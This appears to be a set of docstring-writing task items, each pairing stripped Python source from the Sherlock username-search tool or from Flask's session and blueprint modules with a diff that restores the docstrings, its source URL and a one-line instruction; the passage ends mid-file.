msg = "Illegal Username Format For This Site!"
print(Style.BRIGHT + Fore.WHITE + "[" +
Fore.RED + "-" +
Fore.WHITE + "]" +
Fore.GREEN + f" {self.result.site_name}:" +
Fore.YELLOW + f" {msg}")
elif result.status == QueryStatus.WAF:
if self.print_all:
print(Style.BRIGHT + Fore.WHITE + "[" +
Fore.RED + "-" +
Fore.WHITE + "]" +
Fore.GREEN + f" {self.result.site_name}:" +
Fore.RED + " Blocked by bot detection" +
Fore.YELLOW + " (proxy may help)")
else:
# It should be impossible to ever get here...
raise ValueError(
f"Unknown Query Status '{result.status}' for site '{self.result.site_name}'"
)
return
def finish(self, message="The processing has been finished."):
NumberOfResults = self.countResults() - 1
print(Style.BRIGHT + Fore.GREEN + "[" +
Fore.YELLOW + "*" +
Fore.GREEN + "] Search completed with" +
Fore.WHITE + f" {NumberOfResults} " +
Fore.GREEN + "results" + Style.RESET_ALL
)
def __str__(self):
return str(self.result) | --- +++ @@ -1,3 +1,8 @@+"""Sherlock Notify Module
+
+This module defines the objects for notifying the caller about the
+results of queries.
+"""
from sherlock_project.result import QueryStatus
from colorama import Fore, Style
import webbrowser
@@ -7,34 +12,125 @@
class QueryNotify:
+ """Query Notify Object.
+
+ Base class that describes methods available to notify the results of
+ a query.
+ It is intended that other classes inherit from this base class and
+ override the methods to implement specific functionality.
+ """
def __init__(self, result=None):
+ """Create Query Notify Object.
+
+ Contains information about a specific method of notifying the results
+ of a query.
+
+ Keyword Arguments:
+ self -- This object.
+ result -- Object of type QueryResult() containing
+ results for this query.
+
+ Return Value:
+ Nothing.
+ """
self.result = result
# return
def start(self, message=None):
+ """Notify Start.
+
+ Notify method for start of query. This method will be called before
+ any queries are performed. This method will typically be
+ overridden by higher level classes that will inherit from it.
+
+ Keyword Arguments:
+ self -- This object.
+ message -- Object that is used to give context to start
+ of query.
+ Default is None.
+
+ Return Value:
+ Nothing.
+ """
# return
def update(self, result):
+ """Notify Update.
+
+ Notify method for query result. This method will typically be
+ overridden by higher level classes that will inherit from it.
+
+ Keyword Arguments:
+ self -- This object.
+ result -- Object of type QueryResult() containing
+ results for this query.
+
+ Return Value:
+ Nothing.
+ """
self.result = result
# return
def finish(self, message=None):
+ """Notify Finish.
+
+ Notify method for finish of query. This method will be called after
+ all queries have been performed. This method will typically be
+ overridden by higher level classes that will inherit from it.
+
+ Keyword Arguments:
+ self -- This object.
+ message -- Object that is used to give context to start
+ of query.
+ Default is None.
+
+ Return Value:
+ Nothing.
+ """
# return
def __str__(self):
+ """Convert Object To String.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ Nicely formatted string to get information about this object.
+ """
return str(self.result)
class QueryNotifyPrint(QueryNotify):
+ """Query Notify Print Object.
+
+ Query notify class that prints results.
+ """
def __init__(self, result=None, verbose=False, print_all=False, browse=False):
+ """Create Query Notify Print Object.
+
+ Contains information about a specific method of notifying the results
+ of a query.
+
+ Keyword Arguments:
+ self -- This object.
+ result -- Object of type QueryResult() containing
+ results for this query.
+ verbose -- Boolean indicating whether to give verbose output.
+ print_all -- Boolean indicating whether to only print all sites, including not found.
+ browse -- Boolean indicating whether to open found sites in a web browser.
+
+ Return Value:
+ Nothing.
+ """
super().__init__(result)
self.verbose = verbose
@@ -44,6 +140,18 @@ return
def start(self, message):
+ """Notify Start.
+
+ Will print the title to the standard output.
+
+ Keyword Arguments:
+ self -- This object.
+ message -- String containing username that the series
+ of queries are about.
+
+ Return Value:
+ Nothing.
+ """
title = "Checking username"
@@ -58,11 +166,32 @@ return
def countResults(self):
+ """This function counts the number of results. Every time the function is called,
+ the number of results is increasing.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ The number of results by the time we call the function.
+ """
global globvar
globvar += 1
return globvar
def update(self, result):
+ """Notify Update.
+
+ Will print the query result to the standard output.
+
+ Keyword Arguments:
+ self -- This object.
+ result -- Object of type QueryResult() containing
+ results for this query.
+
+ Return Value:
+ Nothing.
+ """
self.result = result
response_time_text = ""
@@ -128,6 +257,14 @@ return
def finish(self, message="The processing has been finished."):
+ """Notify Start.
+ Will print the last line to the standard output.
+ Keyword Arguments:
+ self -- This object.
+ message -- The 2 last phrases.
+ Return Value:
+ Nothing.
+ """
NumberOfResults = self.countResults() - 1
print(Style.BRIGHT + Fore.GREEN + "[" +
@@ -138,4 +275,12 @@ )
def __str__(self):
- return str(self.result)+ """Convert Object To String.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ Nicely formatted string to get information about this object.
+ """
+ return str(self.result)
| https://raw.githubusercontent.com/sherlock-project/sherlock/HEAD/sherlock_project/notify.py |
Write reusable docstrings |
from importlib.metadata import version as pkg_version, PackageNotFoundError
import pathlib
import tomli
def get_version() -> str:
try:
return pkg_version("sherlock_project")
except PackageNotFoundError:
pyproject_path: pathlib.Path = pathlib.Path(__file__).resolve().parent.parent / "pyproject.toml"
with pyproject_path.open("rb") as f:
pyproject_data = tomli.load(f)
return pyproject_data["tool"]["poetry"]["version"]
# This variable is only used to check for ImportErrors induced by users running as script rather than as module or package
import_error_test_var = None
__shortname__ = "Sherlock"
__longname__ = "Sherlock: Find Usernames Across Social Networks"
__version__ = get_version()
forge_api_latest_release = "https://api.github.com/repos/sherlock-project/sherlock/releases/latest" | --- +++ @@ -1,3 +1,9 @@+""" Sherlock Module
+
+This module contains the main logic to search for usernames at social
+networks.
+
+"""
from importlib.metadata import version as pkg_version, PackageNotFoundError
import pathlib
@@ -5,6 +11,7 @@
def get_version() -> str:
+ """Fetch the version number of the installed package."""
try:
return pkg_version("sherlock_project")
except PackageNotFoundError:
@@ -20,4 +27,4 @@ __longname__ = "Sherlock: Find Usernames Across Social Networks"
__version__ = get_version()
-forge_api_latest_release = "https://api.github.com/repos/sherlock-project/sherlock/releases/latest"+forge_api_latest_release = "https://api.github.com/repos/sherlock-project/sherlock/releases/latest"
| https://raw.githubusercontent.com/sherlock-project/sherlock/HEAD/sherlock_project/__init__.py |
Generate docstrings for exported functions | import json
import requests
import secrets
MANIFEST_URL = "https://raw.githubusercontent.com/sherlock-project/sherlock/master/sherlock_project/resources/data.json"
EXCLUSIONS_URL = "https://raw.githubusercontent.com/sherlock-project/sherlock/refs/heads/exclusions/false_positive_exclusions.txt"
class SiteInformation:
def __init__(self, name, url_home, url_username_format, username_claimed,
information, is_nsfw, username_unclaimed=secrets.token_urlsafe(10)):
self.name = name
self.url_home = url_home
self.url_username_format = url_username_format
self.username_claimed = username_claimed
self.username_unclaimed = secrets.token_urlsafe(32)
self.information = information
self.is_nsfw = is_nsfw
return
def __str__(self):
return f"{self.name} ({self.url_home})"
class SitesInformation:
def __init__(
self,
data_file_path: str|None = None,
honor_exclusions: bool = True,
do_not_exclude: list[str] = [],
):
if not data_file_path:
# The default data file is the live data.json which is in the GitHub repo. The reason why we are using
# this instead of the local one is so that the user has the most up-to-date data. This prevents
# users from creating issue about false positives which has already been fixed or having outdated data
data_file_path = MANIFEST_URL
# Ensure that specified data file has correct extension.
if not data_file_path.lower().endswith(".json"):
raise FileNotFoundError(f"Incorrect JSON file extension for data file '{data_file_path}'.")
# if "http://" == data_file_path[:7].lower() or "https://" == data_file_path[:8].lower():
if data_file_path.lower().startswith("http"):
# Reference is to a URL.
try:
response = requests.get(url=data_file_path, timeout=30)
except Exception as error:
raise FileNotFoundError(
f"Problem while attempting to access data file URL '{data_file_path}': {error}"
)
if response.status_code != 200:
raise FileNotFoundError(f"Bad response while accessing "
f"data file URL '{data_file_path}'."
)
try:
site_data = response.json()
except Exception as error:
raise ValueError(
f"Problem parsing json contents at '{data_file_path}': {error}."
)
else:
# Reference is to a file.
try:
with open(data_file_path, "r", encoding="utf-8") as file:
try:
site_data = json.load(file)
except Exception as error:
raise ValueError(
f"Problem parsing json contents at '{data_file_path}': {error}."
)
except FileNotFoundError:
raise FileNotFoundError(f"Problem while attempting to access "
f"data file '{data_file_path}'."
)
site_data.pop('$schema', None)
if honor_exclusions:
try:
response = requests.get(url=EXCLUSIONS_URL, timeout=10)
if response.status_code == 200:
exclusions = response.text.splitlines()
exclusions = [exclusion.strip() for exclusion in exclusions]
for site in do_not_exclude:
if site in exclusions:
exclusions.remove(site)
for exclusion in exclusions:
try:
site_data.pop(exclusion, None)
except KeyError:
pass
except Exception:
# If there was any problem loading the exclusions, just continue without them
print("Warning: Could not load exclusions, continuing without them.")
honor_exclusions = False
self.sites = {}
# Add all site information from the json file to internal site list.
for site_name in site_data:
try:
self.sites[site_name] = \
SiteInformation(site_name,
site_data[site_name]["urlMain"],
site_data[site_name]["url"],
site_data[site_name]["username_claimed"],
site_data[site_name],
site_data[site_name].get("isNSFW",False)
)
except KeyError as error:
raise ValueError(
f"Problem parsing json contents at '{data_file_path}': Missing attribute {error}."
)
except TypeError:
print(f"Encountered TypeError parsing json contents for target '{site_name}' at {data_file_path}\nSkipping target.\n")
return
def remove_nsfw_sites(self, do_not_remove: list = []):
sites = {}
do_not_remove = [site.casefold() for site in do_not_remove]
for site in self.sites:
if self.sites[site].is_nsfw and site.casefold() not in do_not_remove:
continue
sites[site] = self.sites[site]
self.sites = sites
def site_name_list(self):
return sorted([site.name for site in self], key=str.lower)
def __iter__(self):
for site_name in self.sites:
yield self.sites[site_name]
def __len__(self):
return len(self.sites) | --- +++ @@ -1,3 +1,8 @@+"""Sherlock Sites Information Module
+
+This module supports storing information about websites.
+This is the raw data that will be used to search for usernames.
+"""
import json
import requests
import secrets
@@ -9,6 +14,42 @@ class SiteInformation:
def __init__(self, name, url_home, url_username_format, username_claimed,
information, is_nsfw, username_unclaimed=secrets.token_urlsafe(10)):
+ """Create Site Information Object.
+
+ Contains information about a specific website.
+
+ Keyword Arguments:
+ self -- This object.
+ name -- String which identifies site.
+ url_home -- String containing URL for home of site.
+ url_username_format -- String containing URL for Username format
+ on site.
+ NOTE: The string should contain the
+ token "{}" where the username should
+ be substituted. For example, a string
+ of "https://somesite.com/users/{}"
+ indicates that the individual
+ usernames would show up under the
+ "https://somesite.com/users/" area of
+ the website.
+ username_claimed -- String containing username which is known
+ to be claimed on website.
+ username_unclaimed -- String containing username which is known
+ to be unclaimed on website.
+ information -- Dictionary containing all known information
+ about website.
+ NOTE: Custom information about how to
+ actually detect the existence of the
+ username will be included in this
+ dictionary. This information will
+ be needed by the detection method,
+ but it is only recorded in this
+ object for future use.
+ is_nsfw -- Boolean indicating if site is Not Safe For Work.
+
+ Return Value:
+ Nothing.
+ """
self.name = name
self.url_home = url_home
@@ -22,6 +63,14 @@ return
def __str__(self):
+ """Convert Object To String.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ Nicely formatted string to get information about this object.
+ """
return f"{self.name} ({self.url_home})"
@@ -33,6 +82,38 @@ honor_exclusions: bool = True,
do_not_exclude: list[str] = [],
):
+ """Create Sites Information Object.
+
+ Contains information about all supported websites.
+
+ Keyword Arguments:
+ self -- This object.
+ data_file_path -- String which indicates path to data file.
+ The file name must end in ".json".
+
+ There are 3 possible formats:
+ * Absolute File Format
+ For example, "c:/stuff/data.json".
+ * Relative File Format
+ The current working directory is used
+ as the context.
+ For example, "data.json".
+ * URL Format
+ For example,
+ "https://example.com/data.json", or
+ "http://example.com/data.json".
+
+ An exception will be thrown if the path
+ to the data file is not in the expected
+ format, or if there was any problem loading
+ the file.
+
+ If this option is not specified, then a
+ default site list will be used.
+
+ Return Value:
+ Nothing.
+ """
if not data_file_path:
# The default data file is the live data.json which is in the GitHub repo. The reason why we are using
@@ -130,6 +211,15 @@ return
def remove_nsfw_sites(self, do_not_remove: list = []):
+ """
+ Remove NSFW sites from the sites, if isNSFW flag is true for site
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ None
+ """
sites = {}
do_not_remove = [site.casefold() for site in do_not_remove]
for site in self.sites:
@@ -139,13 +229,37 @@ self.sites = sites
def site_name_list(self):
+ """Get Site Name List.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ List of strings containing names of sites.
+ """
return sorted([site.name for site in self], key=str.lower)
def __iter__(self):
+ """Iterator For Object.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ Iterator for sites object.
+ """
for site_name in self.sites:
yield self.sites[site_name]
def __len__(self):
- return len(self.sites)+ """Length For Object.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ Length of sites object.
+ """
+ return len(self.sites)
| https://raw.githubusercontent.com/sherlock-project/sherlock/HEAD/sherlock_project/sites.py |
Add docstrings to make code maintainable | from __future__ import annotations
import collections.abc as c
import hashlib
import typing as t
from collections.abc import MutableMapping
from datetime import datetime
from datetime import timezone
from itsdangerous import BadSignature
from itsdangerous import URLSafeTimedSerializer
from werkzeug.datastructures import CallbackDict
from .json.tag import TaggedJSONSerializer
if t.TYPE_CHECKING: # pragma: no cover
import typing_extensions as te
from .app import Flask
from .wrappers import Request
from .wrappers import Response
class SessionMixin(MutableMapping[str, t.Any]):
@property
def permanent(self) -> bool:
return self.get("_permanent", False) # type: ignore[no-any-return]
@permanent.setter
def permanent(self, value: bool) -> None:
self["_permanent"] = bool(value)
#: Some implementations can detect whether a session is newly
#: created, but that is not guaranteed. Use with caution. The mixin
# default is hard-coded ``False``.
new = False
#: Some implementations can detect changes to the session and set
#: this when that happens. The mixin default is hard coded to
#: ``True``.
modified = True
accessed = False
"""Indicates if the session was accessed, even if it was not modified. This
is set when the session object is accessed through the request context,
including the global :data:`.session` proxy. A ``Vary: cookie`` header will
be added if this is ``True``.
.. versionchanged:: 3.1.3
This is tracked by the request context.
"""
class SecureCookieSession(CallbackDict[str, t.Any], SessionMixin):
#: When data is changed, this is set to ``True``. Only the session
#: dictionary itself is tracked; if the session contains mutable
#: data (for example a nested dict) then this must be set to
#: ``True`` manually when modifying that data. The session cookie
#: will only be written to the response if this is ``True``.
modified = False
def __init__(
self,
initial: c.Mapping[str, t.Any] | None = None,
) -> None:
def on_update(self: te.Self) -> None:
self.modified = True
super().__init__(initial, on_update)
class NullSession(SecureCookieSession):
def _fail(self, *args: t.Any, **kwargs: t.Any) -> t.NoReturn:
raise RuntimeError(
"The session is unavailable because no secret "
"key was set. Set the secret_key on the "
"application to something unique and secret."
)
__setitem__ = __delitem__ = clear = pop = popitem = update = setdefault = _fail
del _fail
class SessionInterface:
#: :meth:`make_null_session` will look here for the class that should
#: be created when a null session is requested. Likewise the
#: :meth:`is_null_session` method will perform a typecheck against
#: this type.
null_session_class = NullSession
#: A flag that indicates if the session interface is pickle based.
#: This can be used by Flask extensions to make a decision in regards
#: to how to deal with the session object.
#:
#: .. versionadded:: 0.10
pickle_based = False
def make_null_session(self, app: Flask) -> NullSession:
return self.null_session_class()
def is_null_session(self, obj: object) -> bool:
return isinstance(obj, self.null_session_class)
def get_cookie_name(self, app: Flask) -> str:
return app.config["SESSION_COOKIE_NAME"] # type: ignore[no-any-return]
def get_cookie_domain(self, app: Flask) -> str | None:
return app.config["SESSION_COOKIE_DOMAIN"] # type: ignore[no-any-return]
def get_cookie_path(self, app: Flask) -> str:
return app.config["SESSION_COOKIE_PATH"] or app.config["APPLICATION_ROOT"] # type: ignore[no-any-return]
def get_cookie_httponly(self, app: Flask) -> bool:
return app.config["SESSION_COOKIE_HTTPONLY"] # type: ignore[no-any-return]
def get_cookie_secure(self, app: Flask) -> bool:
return app.config["SESSION_COOKIE_SECURE"] # type: ignore[no-any-return]
def get_cookie_samesite(self, app: Flask) -> str | None:
return app.config["SESSION_COOKIE_SAMESITE"] # type: ignore[no-any-return]
def get_cookie_partitioned(self, app: Flask) -> bool:
return app.config["SESSION_COOKIE_PARTITIONED"] # type: ignore[no-any-return]
def get_expiration_time(self, app: Flask, session: SessionMixin) -> datetime | None:
if session.permanent:
return datetime.now(timezone.utc) + app.permanent_session_lifetime
return None
def should_set_cookie(self, app: Flask, session: SessionMixin) -> bool:
return session.modified or (
session.permanent and app.config["SESSION_REFRESH_EACH_REQUEST"]
)
def open_session(self, app: Flask, request: Request) -> SessionMixin | None:
raise NotImplementedError()
def save_session(
self, app: Flask, session: SessionMixin, response: Response
) -> None:
raise NotImplementedError()
session_json_serializer = TaggedJSONSerializer()
def _lazy_sha1(string: bytes = b"") -> t.Any:
return hashlib.sha1(string)
class SecureCookieSessionInterface(SessionInterface):
#: the salt that should be applied on top of the secret key for the
#: signing of cookie based sessions.
salt = "cookie-session"
#: the hash function to use for the signature. The default is sha1
digest_method = staticmethod(_lazy_sha1)
#: the name of the itsdangerous supported key derivation. The default
#: is hmac.
key_derivation = "hmac"
#: A python serializer for the payload. The default is a compact
#: JSON derived serializer with support for some extra Python types
#: such as datetime objects or tuples.
serializer = session_json_serializer
session_class = SecureCookieSession
def get_signing_serializer(self, app: Flask) -> URLSafeTimedSerializer | None:
if not app.secret_key:
return None
keys: list[str | bytes] = []
if fallbacks := app.config["SECRET_KEY_FALLBACKS"]:
keys.extend(fallbacks)
keys.append(app.secret_key) # itsdangerous expects current key at top
return URLSafeTimedSerializer(
keys, # type: ignore[arg-type]
salt=self.salt,
serializer=self.serializer,
signer_kwargs={
"key_derivation": self.key_derivation,
"digest_method": self.digest_method,
},
)
def open_session(self, app: Flask, request: Request) -> SecureCookieSession | None:
s = self.get_signing_serializer(app)
if s is None:
return None
val = request.cookies.get(self.get_cookie_name(app))
if not val:
return self.session_class()
max_age = int(app.permanent_session_lifetime.total_seconds())
try:
data = s.loads(val, max_age=max_age)
return self.session_class(data)
except BadSignature:
return self.session_class()
def save_session(
self, app: Flask, session: SessionMixin, response: Response
) -> None:
name = self.get_cookie_name(app)
domain = self.get_cookie_domain(app)
path = self.get_cookie_path(app)
secure = self.get_cookie_secure(app)
partitioned = self.get_cookie_partitioned(app)
samesite = self.get_cookie_samesite(app)
httponly = self.get_cookie_httponly(app)
# Add a "Vary: Cookie" header if the session was accessed at all.
if session.accessed:
response.vary.add("Cookie")
# If the session is modified to be empty, remove the cookie.
# If the session is empty, return without setting the cookie.
if not session:
if session.modified:
response.delete_cookie(
name,
domain=domain,
path=path,
secure=secure,
partitioned=partitioned,
samesite=samesite,
httponly=httponly,
)
response.vary.add("Cookie")
return
if not self.should_set_cookie(app, session):
return
expires = self.get_expiration_time(app, session)
val = self.get_signing_serializer(app).dumps(dict(session)) # type: ignore[union-attr]
response.set_cookie(
name,
val,
expires=expires,
httponly=httponly,
domain=domain,
path=path,
secure=secure,
partitioned=partitioned,
samesite=samesite,
)
response.vary.add("Cookie") | --- +++ @@ -22,9 +22,11 @@
class SessionMixin(MutableMapping[str, t.Any]):
+ """Expands a basic dictionary with session attributes."""
@property
def permanent(self) -> bool:
+ """This reflects the ``'_permanent'`` key in the dict."""
return self.get("_permanent", False) # type: ignore[no-any-return]
@permanent.setter
@@ -53,6 +55,13 @@
class SecureCookieSession(CallbackDict[str, t.Any], SessionMixin):
+ """Base class for sessions based on signed cookies.
+
+ This session backend will set the :attr:`modified` and
+ :attr:`accessed` attributes. It cannot reliably track whether a
+ session is new (vs. empty), so :attr:`new` remains hard coded to
+ ``False``.
+ """
#: When data is changed, this is set to ``True``. Only the session
#: dictionary itself is tracked; if the session contains mutable
@@ -72,6 +81,10 @@
class NullSession(SecureCookieSession):
+ """Class used to generate nicer error messages if sessions are not
+ available. Will still allow read-only access to the empty session
+ but fail on setting.
+ """
def _fail(self, *args: t.Any, **kwargs: t.Any) -> t.NoReturn:
raise RuntimeError(
@@ -85,6 +98,41 @@
class SessionInterface:
+ """The basic interface you have to implement in order to replace the
+ default session interface which uses werkzeug's securecookie
+ implementation. The only methods you have to implement are
+ :meth:`open_session` and :meth:`save_session`, the others have
+ useful defaults which you don't need to change.
+
+ The session object returned by the :meth:`open_session` method has to
+ provide a dictionary like interface plus the properties and methods
+ from the :class:`SessionMixin`. We recommend just subclassing a dict
+ and adding that mixin::
+
+ class Session(dict, SessionMixin):
+ pass
+
+ If :meth:`open_session` returns ``None`` Flask will call into
+ :meth:`make_null_session` to create a session that acts as replacement
+ if the session support cannot work because some requirement is not
+ fulfilled. The default :class:`NullSession` class that is created
+ will complain that the secret key was not set.
+
+ To replace the session interface on an application all you have to do
+ is to assign :attr:`flask.Flask.session_interface`::
+
+ app = Flask(__name__)
+ app.session_interface = MySessionInterface()
+
+ Multiple requests with the same session may be sent and handled
+ concurrently. When implementing a new session interface, consider
+ whether reads or writes to the backing store must be synchronized.
+ There is no guarantee on the order in which the session for each
+ request is opened or saved, it will occur in the order that requests
+ begin and end processing.
+
+ .. versionadded:: 0.8
+ """
#: :meth:`make_null_session` will look here for the class that should
#: be created when a null session is requested. Likewise the
@@ -100,49 +148,125 @@ pickle_based = False
def make_null_session(self, app: Flask) -> NullSession:
+ """Creates a null session which acts as a replacement object if the
+ real session support could not be loaded due to a configuration
+ error. This mainly aids the user experience because the job of the
+ null session is to still support lookup without complaining but
+ modifications are answered with a helpful error message of what
+ failed.
+
+ This creates an instance of :attr:`null_session_class` by default.
+ """
return self.null_session_class()
def is_null_session(self, obj: object) -> bool:
+ """Checks if a given object is a null session. Null sessions are
+ not asked to be saved.
+
+ This checks if the object is an instance of :attr:`null_session_class`
+ by default.
+ """
return isinstance(obj, self.null_session_class)
def get_cookie_name(self, app: Flask) -> str:
+ """The name of the session cookie. Uses``app.config["SESSION_COOKIE_NAME"]``."""
return app.config["SESSION_COOKIE_NAME"] # type: ignore[no-any-return]
def get_cookie_domain(self, app: Flask) -> str | None:
+ """The value of the ``Domain`` parameter on the session cookie. If not set,
+ browsers will only send the cookie to the exact domain it was set from.
+ Otherwise, they will send it to any subdomain of the given value as well.
+
+ Uses the :data:`SESSION_COOKIE_DOMAIN` config.
+
+ .. versionchanged:: 2.3
+ Not set by default, does not fall back to ``SERVER_NAME``.
+ """
return app.config["SESSION_COOKIE_DOMAIN"] # type: ignore[no-any-return]
def get_cookie_path(self, app: Flask) -> str:
+ """Returns the path for which the cookie should be valid. The
+ default implementation uses the value from the ``SESSION_COOKIE_PATH``
+ config var if it's set, and falls back to ``APPLICATION_ROOT`` or
+ uses ``/`` if it's ``None``.
+ """
return app.config["SESSION_COOKIE_PATH"] or app.config["APPLICATION_ROOT"] # type: ignore[no-any-return]
def get_cookie_httponly(self, app: Flask) -> bool:
+ """Returns True if the session cookie should be httponly. This
+ currently just returns the value of the ``SESSION_COOKIE_HTTPONLY``
+ config var.
+ """
return app.config["SESSION_COOKIE_HTTPONLY"] # type: ignore[no-any-return]
def get_cookie_secure(self, app: Flask) -> bool:
+ """Returns True if the cookie should be secure. This currently
+ just returns the value of the ``SESSION_COOKIE_SECURE`` setting.
+ """
return app.config["SESSION_COOKIE_SECURE"] # type: ignore[no-any-return]
def get_cookie_samesite(self, app: Flask) -> str | None:
+ """Return ``'Strict'`` or ``'Lax'`` if the cookie should use the
+ ``SameSite`` attribute. This currently just returns the value of
+ the :data:`SESSION_COOKIE_SAMESITE` setting.
+ """
return app.config["SESSION_COOKIE_SAMESITE"] # type: ignore[no-any-return]
def get_cookie_partitioned(self, app: Flask) -> bool:
+ """Returns True if the cookie should be partitioned. By default, uses
+ the value of :data:`SESSION_COOKIE_PARTITIONED`.
+
+ .. versionadded:: 3.1
+ """
return app.config["SESSION_COOKIE_PARTITIONED"] # type: ignore[no-any-return]
def get_expiration_time(self, app: Flask, session: SessionMixin) -> datetime | None:
+ """A helper method that returns an expiration date for the session
+ or ``None`` if the session is linked to the browser session. The
+ default implementation returns now + the permanent session
+ lifetime configured on the application.
+ """
if session.permanent:
return datetime.now(timezone.utc) + app.permanent_session_lifetime
return None
def should_set_cookie(self, app: Flask, session: SessionMixin) -> bool:
+ """Used by session backends to determine if a ``Set-Cookie`` header
+ should be set for this session cookie for this response. If the session
+ has been modified, the cookie is set. If the session is permanent and
+ the ``SESSION_REFRESH_EACH_REQUEST`` config is true, the cookie is
+ always set.
+
+ This check is usually skipped if the session was deleted.
+
+ .. versionadded:: 0.11
+ """
return session.modified or (
session.permanent and app.config["SESSION_REFRESH_EACH_REQUEST"]
)
def open_session(self, app: Flask, request: Request) -> SessionMixin | None:
+ """This is called at the beginning of each request, after
+ pushing the request context, before matching the URL.
+
+ This must return an object which implements a dictionary-like
+ interface as well as the :class:`SessionMixin` interface.
+
+ This will return ``None`` to indicate that loading failed in
+ some way that is not immediately an error. The request
+ context will fall back to using :meth:`make_null_session`
+ in this case.
+ """
raise NotImplementedError()
def save_session(
self, app: Flask, session: SessionMixin, response: Response
) -> None:
+ """This is called at the end of each request, after generating
+ a response, before removing the request context. It is skipped
+ if :meth:`is_null_session` returns ``True``.
+ """
raise NotImplementedError()
@@ -150,10 +274,17 @@
def _lazy_sha1(string: bytes = b"") -> t.Any:
+ """Don't access ``hashlib.sha1`` until runtime. FIPS builds may not include
+ SHA-1, in which case the import and use as a default would fail before the
+ developer can configure something else.
+ """
return hashlib.sha1(string)
class SecureCookieSessionInterface(SessionInterface):
+ """The default session interface that stores sessions in signed cookies
+ through the :mod:`itsdangerous` module.
+ """
#: the salt that should be applied on top of the secret key for the
#: signing of cookie based sessions.
@@ -251,4 +382,4 @@ partitioned=partitioned,
samesite=samesite,
)
- response.vary.add("Cookie")+ response.vary.add("Cookie")
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/sessions.py |
Document helper functions with docstrings | from __future__ import annotations
import os
import typing as t
from datetime import timedelta
from .cli import AppGroup
from .globals import current_app
from .helpers import send_from_directory
from .sansio.blueprints import Blueprint as SansioBlueprint
from .sansio.blueprints import BlueprintSetupState as BlueprintSetupState # noqa
from .sansio.scaffold import _sentinel
if t.TYPE_CHECKING: # pragma: no cover
from .wrappers import Response
class Blueprint(SansioBlueprint):
def __init__(
self,
name: str,
import_name: str,
static_folder: str | os.PathLike[str] | None = None,
static_url_path: str | None = None,
template_folder: str | os.PathLike[str] | None = None,
url_prefix: str | None = None,
subdomain: str | None = None,
url_defaults: dict[str, t.Any] | None = None,
root_path: str | None = None,
cli_group: str | None = _sentinel, # type: ignore
) -> None:
super().__init__(
name,
import_name,
static_folder,
static_url_path,
template_folder,
url_prefix,
subdomain,
url_defaults,
root_path,
cli_group,
)
#: The Click command group for registering CLI commands for this
#: object. The commands are available from the ``flask`` command
#: once the application has been discovered and blueprints have
#: been registered.
self.cli = AppGroup()
# Set the name of the Click group in case someone wants to add
# the app's commands to another CLI tool.
self.cli.name = self.name
def get_send_file_max_age(self, filename: str | None) -> int | None:
value = current_app.config["SEND_FILE_MAX_AGE_DEFAULT"]
if value is None:
return None
if isinstance(value, timedelta):
return int(value.total_seconds())
return value # type: ignore[no-any-return]
def send_static_file(self, filename: str) -> Response:
if not self.has_static_folder:
raise RuntimeError("'static_folder' must be set to serve static_files.")
# send_file only knows to call get_send_file_max_age on the app,
# call it here so it works for blueprints too.
max_age = self.get_send_file_max_age(filename)
return send_from_directory(
t.cast(str, self.static_folder), filename, max_age=max_age
)
def open_resource(
self, resource: str, mode: str = "rb", encoding: str | None = "utf-8"
) -> t.IO[t.AnyStr]:
if mode not in {"r", "rt", "rb"}:
raise ValueError("Resources can only be opened for reading.")
path = os.path.join(self.root_path, resource)
if mode == "rb":
return open(path, mode) # pyright: ignore
return open(path, mode, encoding=encoding) | --- +++ @@ -53,6 +53,22 @@ self.cli.name = self.name
def get_send_file_max_age(self, filename: str | None) -> int | None:
+ """Used by :func:`send_file` to determine the ``max_age`` cache
+ value for a given file path if it wasn't passed.
+
+ By default, this returns :data:`SEND_FILE_MAX_AGE_DEFAULT` from
+ the configuration of :data:`~flask.current_app`. This defaults
+ to ``None``, which tells the browser to use conditional requests
+ instead of a timed cache, which is usually preferable.
+
+ Note this is a duplicate of the same method in the Flask
+ class.
+
+ .. versionchanged:: 2.0
+ The default configuration is ``None`` instead of 12 hours.
+
+ .. versionadded:: 0.9
+ """
value = current_app.config["SEND_FILE_MAX_AGE_DEFAULT"]
if value is None:
@@ -64,6 +80,17 @@ return value # type: ignore[no-any-return]
def send_static_file(self, filename: str) -> Response:
+ """The view function used to serve files from
+ :attr:`static_folder`. A route is automatically registered for
+ this view at :attr:`static_url_path` if :attr:`static_folder` is
+ set.
+
+ Note this is a duplicate of the same method in the Flask
+ class.
+
+ .. versionadded:: 0.5
+
+ """
if not self.has_static_folder:
raise RuntimeError("'static_folder' must be set to serve static_files.")
@@ -77,6 +104,19 @@ def open_resource(
self, resource: str, mode: str = "rb", encoding: str | None = "utf-8"
) -> t.IO[t.AnyStr]:
+ """Open a resource file relative to :attr:`root_path` for reading. The
+ blueprint-relative equivalent of the app's :meth:`~.Flask.open_resource`
+ method.
+
+ :param resource: Path to the resource relative to :attr:`root_path`.
+ :param mode: Open the file in this mode. Only reading is supported,
+ valid values are ``"r"`` (or ``"rt"``) and ``"rb"``.
+ :param encoding: Open the file with this encoding when opening in text
+ mode. This is ignored when opening in binary mode.
+
+ .. versionchanged:: 3.1
+ Added the ``encoding`` parameter.
+ """
if mode not in {"r", "rt", "rb"}:
raise ValueError("Resources can only be opened for reading.")
@@ -85,4 +125,4 @@ if mode == "rb":
return open(path, mode) # pyright: ignore
- return open(path, mode, encoding=encoding)+ return open(path, mode, encoding=encoding)
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/blueprints.py |
Add concise docstrings to each method | from __future__ import annotations
import typing as t
from jinja2.loaders import BaseLoader
from werkzeug.routing import RequestRedirect
from .blueprints import Blueprint
from .globals import _cv_app
from .sansio.app import App
if t.TYPE_CHECKING:
from .sansio.scaffold import Scaffold
from .wrappers import Request
class UnexpectedUnicodeError(AssertionError, UnicodeError):
class DebugFilesKeyError(KeyError, AssertionError):
def __init__(self, request: Request, key: str) -> None:
form_matches = request.form.getlist(key)
buf = [
f"You tried to access the file {key!r} in the request.files"
" dictionary but it does not exist. The mimetype for the"
f" request is {request.mimetype!r} instead of"
